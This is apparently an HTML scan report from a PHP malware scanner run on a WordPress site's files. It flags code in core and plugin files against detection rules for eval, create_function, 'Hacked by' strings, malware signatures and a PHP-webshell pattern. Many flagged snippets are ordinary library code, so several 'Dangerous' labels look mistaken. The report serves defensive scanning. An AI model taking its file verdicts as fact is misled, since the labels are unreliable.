</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_130").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/atomlib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_131" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$k,$v'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;"$k=\"$v\"";'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">map_xmlns_func&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$p,$n'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'$xd&nbsp;=&nbsp;"xmlns";&nbsp;if(strlen($n[0])&gt;0)&nbsp;$xd&nbsp;.=&nbsp;":{$n[0]}";&nbsp;return&nbsp;"{$xd}=\"{$n[1]}\"";'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_p</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)&nbsp;{&nbsp;if(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">debug</span><span style="color: #007700">)&nbsp;{&nbsp;print&nbsp;</span><span style="color: #0000BB">str_repeat</span><span style="color: #007700">(</span><span style="color: #DD0000">"&nbsp;"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">depth&nbsp;</span><span style="color: #007700">*&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">indent</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #0000BB">$msg&nbsp;</span><span style="color: #007700">.</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">error_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$log_level</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$log_text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$error_file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$error_line</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$log_text</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">parse</span><span style="color: #007700">()&nbsp;{&nbsp;</span><span style="color: #0000BB">set_error_handler</span><span style="color: #007700">(array(&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'error_handler'</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">array_unshift</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ns_contexts</span><span style="color: #007700">,...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_131").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/contact-form-7/includes/formatting.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 6.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_132" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'$matches'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'return&nbsp;str_replace("\n",&nbsp;"&lt;WPPreserveNewline&nbsp;/&gt;",&nbsp;$matches[0]);'&nbsp;</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'|(?&lt;!&lt;br&nbsp;/&gt;)\s*\n|'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"&lt;br&nbsp;/&gt;\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'&lt;WPPreserveNewline&nbsp;/&gt;'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!(&lt;/?'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$allblocks&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'[^&gt;]*&gt;)\s*&lt;br&nbsp;/&gt;!'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"$1"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!&lt;br&nbsp;/&gt;(\s*&lt;/?(?:p|li|div|dl|dd|dt|th|pre|td|ul|ol)[^&gt;]*&gt;)!'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'$1'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$pee</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'&lt;pre'&nbsp;</span><span style="color: #007700">)&nbsp;!==&nbsp;</span><span style="color: #0000BB">false&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">$pee&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">preg_replace_callback</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'!(&lt;pre[^&gt;]*&gt;)(.*?)&lt;/pr...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_132").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/libraries/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 185.99 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_133" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2592</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_133").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/plugin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 41.31 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_134" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$e'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'trigger_error($e-&gt;getMessage(),&nbsp;E_USER_ERROR);'</span><span style="color: #007700">);&nbsp;}&nbsp;else{&nbsp;</span><span style="color: #0000BB">$exception_handler&nbsp;</span><span style="color: #007700">=&nbsp;function(</span><span style="color: #0000BB">$e</span><span style="color: #007700">){&nbsp;</span><span style="color: #0000BB">trigger_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$e</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">(),&nbsp;</span><span style="color: #0000BB">E_USER_ERROR</span><span style="color: #007700">);&nbsp;};&nbsp;}&nbsp;</span><span style="color: #0000BB">set_exception_handler</span><span style="color: #007700">(</span><span style="color: #0000BB">$exception_handler</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$option_name&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">'_Options'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$options_default&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">PMXI_Config</span><span style="color: #007700">::</span><span style="color: #0000BB">createFromFile</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">ROOT_DIR&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/config/options.php'</span><span style="color: #007700">)-&gt;</span><span style="color: #0000BB">toArray</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$wpai_options&nbsp;</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">update_option</span><span style="color: #007700">(</span><span style="color: #0000BB">$option_name</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$options_default</span><span style="color: #007700">);&nbsp;require_once&nbsp;</span><span style="color: #0000BB">ABSPATH&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'w...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_134").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/classes/PHPExcel/Reader/Excel5.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 285.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_135" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7576</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_135").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/classes/PHPExcel/Helper/HTML.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 24.21 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_136" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">lave</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_136").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 209.23 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_137" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2588</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3575</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_137").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/OLERead.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_138" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit hacked_by <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 308</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hacker credits</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Hacked&nbsp;by</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_138").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/classes/PHPExcel/Shared/File.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.87 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_139" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_139").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-content/plugins/wp-all-import/helpers/functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 7.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:16</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_140" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval&nbsp;(</span><span style="color: #DD0000">"return&nbsp;(</span><span style="color: #0000BB">$str</span><span style="color: #DD0000">);"</span><span style="color: #007700">))&nbsp;?&nbsp;</span><span style="color: #0000BB">$then&nbsp;</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$else</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'is_empty'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">is_empty</span><span style="color: #007700">(</span><span style="color: #0000BB">$var</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;empty(</span><span style="color: #0000BB">$var</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(!</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_human_filesize'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_human_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$decimals&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">2</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$sz&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">'BKMGTP'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$factor&nbsp;</span><span style="color: #007700">=&nbsp;(int)&nbsp;</span><span style="color: #0000BB">floor</span><span style="color: #007700">((</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)&nbsp;/&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">sprintf</span><span style="color: #007700">(</span><span style="color: #DD0000">"%.</span><span style="color: #007700">{</span><span style="color: #0000BB">$decimals</span><span style="color: #007700">}</span><span style="color: #DD0000">f"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$bytes&nbsp;</span><span style="color: #007700">/&nbsp;</span><span style="color: #0000BB">pow</span><span style="color: #007700">(</span><span style="color: #0000BB">1024</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$factor</span><span style="color: #007700">))&nbsp;.&nbsp;(isset(</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">])&nbsp;?&nbsp;</span><span style="color: #0000BB">$sz</span><span style="color: #007700">[</span><span style="color: #0000BB">$factor</span><span style="color: #007700">]&nbsp;:&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'pmxi_get_remote_image_ext'</span><span style="color: #007700">)){&nbsp;function&nbsp;</span><span style="color: #0000BB">pmxi_get_remote_image_ext</span><span style="color: #007700">(</span><span style="color: #0000BB">$fil</span><span style="color: #007700">...</span>
</span>
